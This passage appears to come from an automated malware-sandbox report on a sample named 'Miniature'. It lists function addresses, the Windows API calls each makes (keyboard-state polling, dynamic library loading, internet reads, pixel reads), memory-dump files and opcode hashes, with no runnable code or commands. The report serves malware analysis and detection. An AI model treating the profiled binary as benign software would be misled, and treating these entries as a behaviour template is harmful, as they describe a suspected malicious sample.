                                                                                                                                                                                                                                                                                            • GetPrivateProfileSectionW.KERNEL32(?,00000003,00000003,?), ref: 00C8961F
                                                                                                                                                                                                                                                                                            • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 00C89677
                                                                                                                                                                                                                                                                                            • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 00C8969C
                                                                                                                                                                                                                                                                                            • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00C896A4
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: PrivateProfile$SectionWrite$String
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 2832842796-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 1bbc4db32aded00effc953b543bf6e058e5bbfb2618118692fd090762a3e1dc5
                                                                                                                                                                                                                                                                                            • Instruction ID: a07f8deb63e52e31c5a486a17353765448feb5f4832b161139b24a97ae081e17
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1bbc4db32aded00effc953b543bf6e058e5bbfb2618118692fd090762a3e1dc5
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 34514E35A00215AFCB05DF55C881AAEBBF5FF49318F088058F84AAB362DB35ED41DB94
                                                                                                                                                                                                                                                                                            Function 00C99941 Relevance: 7.6, APIs: 5, Instructions: 143libraryloaderCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • LoadLibraryW.KERNEL32(?,00000000,?), ref: 00C9999D
                                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,?), ref: 00C99A2D
                                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 00C99A49
                                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,?), ref: 00C99A8F
                                                                                                                                                                                                                                                                                            • FreeLibrary.KERNEL32(00000000), ref: 00C99AAF
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C2F9D4: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,00000000,?,?,?,00C81A02,?,75C0E610), ref: 00C2F9F1
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C2F9D4: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00C70354,00000000,00000000,?,?,00C81A02,?,75C0E610,?,00C70354), ref: 00C2FA18
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 666041331-0
                                                                                                                                                                                                                                                                                            • Opcode ID: c2e8b429f2811a7d49e0639627edcf437e1c21f5f43d91aa8dbedbc3cdbd18ba
                                                                                                                                                                                                                                                                                            • Instruction ID: c4a23f658ba44d577c061c19a1e561c58bd5ae40fcdc1e8ddf75f396b2f71a3a
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c2e8b429f2811a7d49e0639627edcf437e1c21f5f43d91aa8dbedbc3cdbd18ba
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 41514D35604205DFCB05EF68C48599DBBF0FF0A314B1580A8E81A9B762DB31EE86DF91
                                                                                                                                                                                                                                                                                            Function 00CA75AE Relevance: 7.6, APIs: 5, Instructions: 131windowCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • SetWindowLongW.USER32(00000002,000000F0,?), ref: 00CA766B
                                                                                                                                                                                                                                                                                            • SetWindowLongW.USER32(?,000000EC,?), ref: 00CA7682
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000002,00001036,00000000,?), ref: 00CA76AB
                                                                                                                                                                                                                                                                                            • ShowWindow.USER32(00000002,00000000,00000002,00000002,?,?,?,?,?,?,?,00C8B5BE,00000000,00000000), ref: 00CA76D0
                                                                                                                                                                                                                                                                                            • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000027,00000002,?,00000001,00000002,00000002,?,?,?), ref: 00CA76FF
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: Window$Long$MessageSendShow
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 3688381893-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 67edd0df74e57af027644a725cfead8181e35bd2bb3d8d5cc31ca178e06c3fdb
                                                                                                                                                                                                                                                                                            • Instruction ID: 8862b3d0b86b852eca49c921c810b16f42986e420209d3bcbece2cc4d9d20296
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 67edd0df74e57af027644a725cfead8181e35bd2bb3d8d5cc31ca178e06c3fdb
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7541D335A08506AFD7298F2CCC48FA97B65FB47358F150324F825A72E1D770AE51D650
                                                                                                                                                                                                                                                                                            Function 00C423C1 Relevance: 7.6, APIs: 5, Instructions: 129COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: _free
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 269201875-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 5e6e895edc62037e42b78344baee24420b63e4e928f36a710e8b9d9d765793e1
                                                                                                                                                                                                                                                                                            • Instruction ID: a6f32a1c25a95c8e625f39b772f79e7cc1018b29a27a3360cf8f4bddb5218efa
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5e6e895edc62037e42b78344baee24420b63e4e928f36a710e8b9d9d765793e1
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0C41AF32E002009FDB24DF78C882A5DB7E5FF89314F6545A9F516EB395DA31AE01DB81
                                                                                                                                                                                                                                                                                            Function 00C119CD Relevance: 7.6, APIs: 5, Instructions: 121keyboardCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • GetCursorPos.USER32(?), ref: 00C119E1
                                                                                                                                                                                                                                                                                            • ScreenToClient.USER32(00000000,?), ref: 00C119FE
                                                                                                                                                                                                                                                                                            • GetAsyncKeyState.USER32(00000001), ref: 00C11A23
                                                                                                                                                                                                                                                                                            • GetAsyncKeyState.USER32(00000002), ref: 00C11A3D
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: AsyncState$ClientCursorScreen
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 4210589936-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 768770fda19b27f3d685369eb1f90801b19ebc5006f99cfd914eee7079b092b8
                                                                                                                                                                                                                                                                                            • Instruction ID: 982200ec228b7ce16de571d72209fd0b779890ba305ab8ed2fa3036257c89b25
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 768770fda19b27f3d685369eb1f90801b19ebc5006f99cfd914eee7079b092b8
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4041B375A0454AFFDF059F64C854BEEBB70FF06324F24421AE829A3290C7346A94EB91
                                                                                                                                                                                                                                                                                            Function 00C842B9 Relevance: 7.6, APIs: 5, Instructions: 101windowCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • GetInputState.USER32 ref: 00C84310
                                                                                                                                                                                                                                                                                            • TranslateAcceleratorW.USER32(?,00000000,?), ref: 00C84367
                                                                                                                                                                                                                                                                                            • TranslateMessage.USER32(?), ref: 00C84390
                                                                                                                                                                                                                                                                                            • DispatchMessageW.USER32(?), ref: 00C8439A
                                                                                                                                                                                                                                                                                            • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00C843AB
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: Message$Translate$AcceleratorDispatchInputPeekState
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 2256411358-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 95a968918cd65446f9c4371afbe134c0e2f724a3a3ebf77d83ddcbffaedb5a3c
                                                                                                                                                                                                                                                                                            • Instruction ID: d82fc004e66746fc62a762c24d62b080f3b7cd23659f643c5f0fe2464589fb53
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 95a968918cd65446f9c4371afbe134c0e2f724a3a3ebf77d83ddcbffaedb5a3c
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4E3193705043879EEB3CEB64D888FAA37ACAB0130DF044569D473861B1E7A49585CB29
                                                                                                                                                                                                                                                                                            Function 00C7224E Relevance: 7.6, APIs: 5, Instructions: 93sleepwindowCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • GetWindowRect.USER32(?,?), ref: 00C72262
                                                                                                                                                                                                                                                                                            • PostMessageW.USER32(00000001,00000201,00000001), ref: 00C7230E
                                                                                                                                                                                                                                                                                            • Sleep.KERNEL32(00000000,?,?,?), ref: 00C72316
                                                                                                                                                                                                                                                                                            • PostMessageW.USER32(00000001,00000202,00000000), ref: 00C72327
                                                                                                                                                                                                                                                                                            • Sleep.KERNEL32(00000000,?,?,?,?), ref: 00C7232F
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: MessagePostSleep$RectWindow
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 3382505437-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 64adfe436902f4086a47174ff6321b01c216aeb4002ad0071291354f3eec01ec
                                                                                                                                                                                                                                                                                            • Instruction ID: 0a8ca8731824c168849072742c2227039f4df37eca3645e779e4300134e14ae7
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 64adfe436902f4086a47174ff6321b01c216aeb4002ad0071291354f3eec01ec
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B431B171900219EFDB14CFA8CD89BDE7BB5EB05325F108225FA26A72E1C770DA44DB90
                                                                                                                                                                                                                                                                                            Function 00C8D95F Relevance: 7.6, APIs: 5, Instructions: 93networkfileCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • InternetQueryDataAvailable.WININET(?,?,00000000,00000000,00000000,?,00000000,?,?,?,00C8CC63,00000000), ref: 00C8D97D
                                                                                                                                                                                                                                                                                            • InternetReadFile.WININET(?,00000000,?,?), ref: 00C8D9B4
                                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,00000000,?,?,?,00C8CC63,00000000), ref: 00C8D9F9
                                                                                                                                                                                                                                                                                            • SetEvent.KERNEL32(?,?,00000000,?,?,?,00C8CC63,00000000), ref: 00C8DA0D
                                                                                                                                                                                                                                                                                            • SetEvent.KERNEL32(?,?,00000000,?,?,?,00C8CC63,00000000), ref: 00C8DA37
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: EventInternet$AvailableDataErrorFileLastQueryRead
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 3191363074-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 6bbd50030e2eea17b9d03f1aab6acf78e3524d55c8eb4271f332aa2c0afc9562
                                                                                                                                                                                                                                                                                            • Instruction ID: 0e51ba046cf1b9c76dcb5f79e048066f239747055ba9dc79151132ebc109bbf4
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6bbd50030e2eea17b9d03f1aab6acf78e3524d55c8eb4271f332aa2c0afc9562
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 11314A71504205EFDB24EFA6D884AAFBBF8EB04358B20442EE557D3190DB30EE41EB64
                                                                                                                                                                                                                                                                                            Function 00CA61A5 Relevance: 7.6, APIs: 5, Instructions: 82windowCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00001053,000000FF,?), ref: 00CA61E4
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00001074,?,00000001), ref: 00CA623C
                                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 00CA624E
                                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 00CA6259
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00001002,00000000,?), ref: 00CA62B5
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: MessageSend$_wcslen
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 763830540-0
                                                                                                                                                                                                                                                                                            • Opcode ID: c75fc7a287152d9ec3b667be720650185b6106c6f5d2bfd79b7ac71ccbfe2f2d
                                                                                                                                                                                                                                                                                            • Instruction ID: bfe3b2b3d46f10080a8a5391e3ba35d994ab49268d3be628d6d9b37f26fe7265
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c75fc7a287152d9ec3b667be720650185b6106c6f5d2bfd79b7ac71ccbfe2f2d
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 772185719002199ADF209FA5DC84BEE77B8EF06328F148216FA35EB184D7709A85DF50
                                                                                                                                                                                                                                                                                            Function 00C9138D Relevance: 7.6, APIs: 5, Instructions: 69COMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • IsWindow.USER32(00000000), ref: 00C913AE
                                                                                                                                                                                                                                                                                            • GetForegroundWindow.USER32 ref: 00C913C5
                                                                                                                                                                                                                                                                                            • GetDC.USER32(00000000), ref: 00C91401
                                                                                                                                                                                                                                                                                            • GetPixel.GDI32(00000000,?,00000003), ref: 00C9140D
                                                                                                                                                                                                                                                                                            • ReleaseDC.USER32(00000000,00000003), ref: 00C91445
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: Window$ForegroundPixelRelease
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 4156661090-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 7b349b27ec23e955891016b178be3d63ec403c653b716e8adf5963be362b2e66
                                                                                                                                                                                                                                                                                            • Instruction ID: 761895bf4a5dbaf9f2950204c577fdde04b39f0827b047b29cabe702a9ed1ca0
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7b349b27ec23e955891016b178be3d63ec403c653b716e8adf5963be362b2e66
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1A218E76600214AFDB04EF65C889BAEB7F5EF49304B048429F85BD7761CA30AD40DB90
                                                                                                                                                                                                                                                                                            Function 00C4D13D Relevance: 7.6, APIs: 5, Instructions: 68COMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • GetEnvironmentStringsW.KERNEL32 ref: 00C4D146
                                                                                                                                                                                                                                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00C4D169
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C43B93: RtlAllocateHeap.NTDLL(00000000,?,?,?,00C36A79,?,0000015D,?,?,?,?,00C385B0,000000FF,00000000,?,?), ref: 00C43BC5
                                                                                                                                                                                                                                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 00C4D18F
                                                                                                                                                                                                                                                                                            • _free.LIBCMT ref: 00C4D1A2
                                                                                                                                                                                                                                                                                            • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00C4D1B1
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 336800556-0
                                                                                                                                                                                                                                                                                            • Opcode ID: b71946c0a361ac1bfd32f32427d4d5e7d7f1cb07d60ff68f9f822d4b0d56d8a6
                                                                                                                                                                                                                                                                                            • Instruction ID: 19452532b11db86f3a63e12d4c453a6ae6174b1365876fc4b12190fbb6809e69
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b71946c0a361ac1bfd32f32427d4d5e7d7f1cb07d60ff68f9f822d4b0d56d8a6
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8A01B1736026157F272136665C88E7F6A7DFEC3B71314016ABD07C7250DA608D0191B0
                                                                                                                                                                                                                                                                                            Function 00C76078 Relevance: 7.6, APIs: 5, Instructions: 61COMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmpDownload File
